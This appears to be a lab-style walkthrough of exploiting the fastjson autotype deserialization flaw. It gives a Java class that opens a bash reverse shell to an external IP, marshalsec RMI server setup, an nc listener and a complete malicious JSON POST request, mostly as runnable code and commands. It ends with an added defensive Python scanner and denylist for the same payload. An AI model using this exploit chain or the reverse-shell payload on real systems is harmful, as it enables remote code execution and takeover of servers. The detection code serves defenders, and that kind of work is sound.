Contents
Compile test.java (command: javac test.java)
Local listener on port 8002 (8002 is the port set in test.java)
Principle
When fastjson autotype processes a JSON object it performs no safety check on the @type field, so an attacker can supply a dangerous class, have that class connect to a remote host, and execute code through a malicious class.
Affected versions
fastjson < 1.2.25
Download the tool
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package -DskipTests

After the build, switch to the target directory and create test.java
(command: vim test.java, paste the code below, change the reverse-shell address and port)
import java.lang.Runtime;
import java.lang.Process;

public class test {
    // static initializer: runs as soon as the class is loaded
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/124.223.63.91/8002 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Compile test.java (command: javac test.java)

Start an HTTP server so that test.class can be fetched
python2: python2 -m SimpleHTTPServer
python3: python3 -m http.server
Visit 124.223.63.91:8000

Start the RMI service listening on port 9999
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://124.223.63.91:8000/#test" 9999
(8000 is the port of the HTTP server started in the previous step)

Local listener on port 8002 (8002 is the port set in test.java)
Command: nc -nvlp 8002

Construct the request
POST / HTTP/1.1
Host: 172.16.181.6:8090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json;charset=UTF-8
Upgrade-Insecure-Requests: 1
Content-Length: 157

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://124.223.63.91:9999/Test",
        "autoCommit":true
    }
}

Check the port
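As an added example from the defensive side (not part of this write-up or of marshalsec), the following Python scans a request body such as the one constructed above for fastjson autotype indicators: it decodes the JSON first, walks every nested object for @type keys, and flags the JdbcRowSetImpl gadget class together with rmi:/ldap: data-source URLs. The host in the sample body and the contents of the denylist are constructed placeholders, not values from a real deployment.

```python
from __future__ import annotations
import json
import re
from typing import Any, Iterator

# Gadget class abused through @type in the request above. Illustrative only;
# assumption: a real deployment keeps a much longer denylist (or an allowlist).
DANGEROUS_TYPES = {"com.sun.rowset.JdbcRowSetImpl"}

# JNDI provider schemes that a dataSourceName can be pointed at.
JNDI_URL = re.compile(r"^\s*(rmi|ldap|ldaps|iiop)://", re.IGNORECASE)


def walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any, Any]]:
    """Yield (json_path, key, value) for every member, recursing into nested objects and arrays."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            yield child, key, value
            yield from walk(value, child)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")


def scan_body(body: str) -> list[str]:
    """Return findings for one request body; an empty list means nothing suspicious."""
    try:
        doc = json.loads(body)  # decode first: a naive grep misses "\u0040type"-style escaped keys
    except ValueError:
        return []
    findings = []
    for path, key, value in walk(doc):
        if key == "@type" and isinstance(value, str):
            if value in DANGEROUS_TYPES:
                findings.append(f"{path}: autotype gadget {value}")
            else:
                findings.append(f"{path}: autotype key present ({value})")
        elif isinstance(value, str) and JNDI_URL.match(value):
            findings.append(f"{path}: JNDI URL {value}")
    return findings


# Constructed sample bodies: the payload shape from the request above (placeholder host),
# the same payload with the @type key unicode-escaped, and a benign body.
PAYLOAD = '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ATTACKER_HOST:9999/Test","autoCommit":true}}'
ESCAPED = PAYLOAD.replace('"@type"', '"\\u0040type"')
BENIGN = '{"b":{"name":"alice","autoCommit":true}}'

if __name__ == "__main__":
    for label, body in (("payload", PAYLOAD), ("escaped", ESCAPED), ("benign", BENIGN)):
        print(label, scan_body(body))
```

Running the block prints two findings for both the plain and the escaped payload and none for the benign body, which is why the check decodes JSON before matching rather than grepping raw bytes.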